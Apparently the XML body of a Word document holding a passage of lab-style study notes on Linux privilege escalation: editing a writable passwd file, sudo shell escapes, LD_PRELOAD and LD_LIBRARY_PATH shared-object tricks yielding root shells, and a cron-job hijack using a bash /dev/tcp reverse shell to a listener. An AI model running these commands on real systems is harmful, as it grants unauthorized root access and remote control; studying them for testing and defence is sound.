          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>generate new password hash with a password of choice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B8B928" w14:textId="13DE1EBD" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>openssl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> passwd &lt;password&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4DF055" w14:textId="35A3427D" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>edit passwd file with new password</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="533A7C84" w14:textId="31328771" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create new root profile, copying line to bottom of list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A82C80D" w14:textId="575CFE16" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>newroot</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="258C78A5" w14:textId="5DB82A05" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo – Shell Escape Sequences</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D30F5F4" w14:textId="5F978AF0" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>list programs that sudo allows user profile to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53B9FB58" w14:textId="61C12762" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo -l</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A10CFDD" w14:textId="16133DB3" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">visit </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7B32C9BA" w14:textId="495A8E2E" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>program listed with sudo as function to elevate privileges via escape sequence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="320D4CE9" w14:textId="2E752D0A" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="0049383E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Sudo – Environment Variables</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="604DAFC6" w14:textId="1E72E64F" w:rsidR="0049383E" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo can be configured to inherit certain environment variables from user environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38FA35D9" w14:textId="225AE711" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo -l</w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:tab/>
      </w:r>
    </w:p>
    <w:p w14:paraId="145F47A7" w14:textId="3C1F5FFB" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">look for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>env_keep</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> options</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB20590" w14:textId="25369A89" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LD_PRELOAD or LD_LIBRARY_PATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AD352A3" w14:textId="7AFE482E" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>both inherited from user environment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08240726" w14:textId="554A6AD8" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LD_PRELOAD loads a shared object before any others when a program is run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F1C087" w14:textId="28FB1217" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>LD_LIBRARY_PATH provides a list of directories where shared libraries are searched for first</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42F1C795" w14:textId="1311CF07" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create a shared object using the code</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D3FEDA0" w14:textId="5E8BD279" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>/home/user/tools/sudo/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>preload.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3516645E" w14:textId="3D6F9CCC" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -shared -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>nostartfiles</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -o /tmp/preload.so /home/user/tools/sudo/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>preload.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7DDF04B0" w14:textId="6EC0EC80" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="5"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo LD_PRELOAD=/tmp/preload.so &lt;program&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3DDD5D" w14:textId="18E9AA7C" w:rsidR="001F7792" w:rsidRPr="0084205E" w:rsidRDefault="001F7792" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>creates root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="573E21AD" w14:textId="1476F42C" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">run </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ldd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> against apache2 (program without exploits on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>) to detect shared libraries being used</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32820A6F" w14:textId="5B0FE4D9" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ldd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sbin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BCB3153" w14:textId="2D1CEE08" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>create shared object with same name as a listed library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49E46DEA" w14:textId="5134050D" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>gcc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> -o /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/libcrypt.so.1 -shared -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>fPIC</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> /home/user/tools/sudo/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>library_path.c</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="53B29BEA" w14:textId="03734B29" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>run apache2 using sudo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7917229B" w14:textId="78358333" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>sudo LD_LIBRARY_PATH=/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> apache2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F73BBB" w14:textId="7FC53BA8" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>root shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C8EA91F" w14:textId="00D82463" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00730B10" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cron Jobs – File Permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF897AB" w14:textId="1F4D2780" w:rsidR="00730B10" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>cat /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>etc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/crontab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF12D0B" w14:textId="3E6C756B" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">locate full path of </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>cron</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> job</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61E15E9D" w14:textId="4D96288F" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>locate &lt;filename.sh&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="149ECA9F" w14:textId="59E09A73" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>confirm permissions</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1892122F" w14:textId="7F94ADF3" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>ls -l &lt;path, /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/local/bin/&lt;filename&gt;&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05E24CED" w14:textId="58423E32" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>edit with bash shell script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0058D83D" w14:textId="136227BC" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="4"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> &gt;&amp; /dev/tcp/10.10.10.10/4444 0&gt;&amp;1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379B13FD" w14:textId="592E362D" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>setup netcat listener on attacker machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE1336A" w14:textId="56DC280F" w:rsidR="00F41586" w:rsidRPr="0084205E" w:rsidRDefault="00F41586" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>CronJobs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> – PATH Environment Variable</w:t>
      </w:r>
    </w:p>
